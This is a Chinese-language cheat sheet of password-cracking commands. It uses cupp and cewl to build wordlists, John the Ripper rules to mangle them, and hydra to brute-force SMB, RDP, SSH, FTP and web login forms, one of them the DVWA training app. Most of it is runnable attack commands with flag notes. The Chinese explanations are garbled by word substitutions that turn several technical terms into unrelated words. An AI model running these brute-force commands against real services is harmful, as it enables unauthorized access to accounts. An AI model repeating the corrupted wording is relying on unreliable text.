利用
python cupp.py-i输入上面命令会和程序进行交互,输入干系的信息就行
通过网络网站信息天生字典
cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt # -m:最小单词长度 -d 爬网深度 -e 网络包含email地址信息 -c 每个单词涌现次数 支持基本、择要身份认证 支持代理
/etc/john/john.conf - [List.Rules:Wordlist] - $[0-9]$[0-9]$[0-9] - john --wordlist=cewl.txt -rules --stdout > m.txt (根据基本的字典天生新的字典)-[list.Rules:test] $[0-9]$[0-9]$[0-9]$[a-zA-Z] $[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[`~!@#$%^&()-_=+]- john --wordlist=cewl.txt --rules=test --stdout > m.txt- john --wordlist=ahm.lst --rules=test HASHFILE在线密码破解——hydrahydra九头蛇,砍去一个头即长出新头,后为大力神赫拉克勒斯所杀
hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVhydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV
Linux密码破解
hydra -l root -P pass.lst ssh://1.1.1.1 -vV其他做事密码破解
hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64
xhydra
HTTP表单身份认证
hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Lin:S=index.php" -V
hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login Failed" -V
/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo:Foo C:先访问指定页面得到cookie H:指定http头 https-post-form\http-get-form\https-get-form -S:利用SSL连接
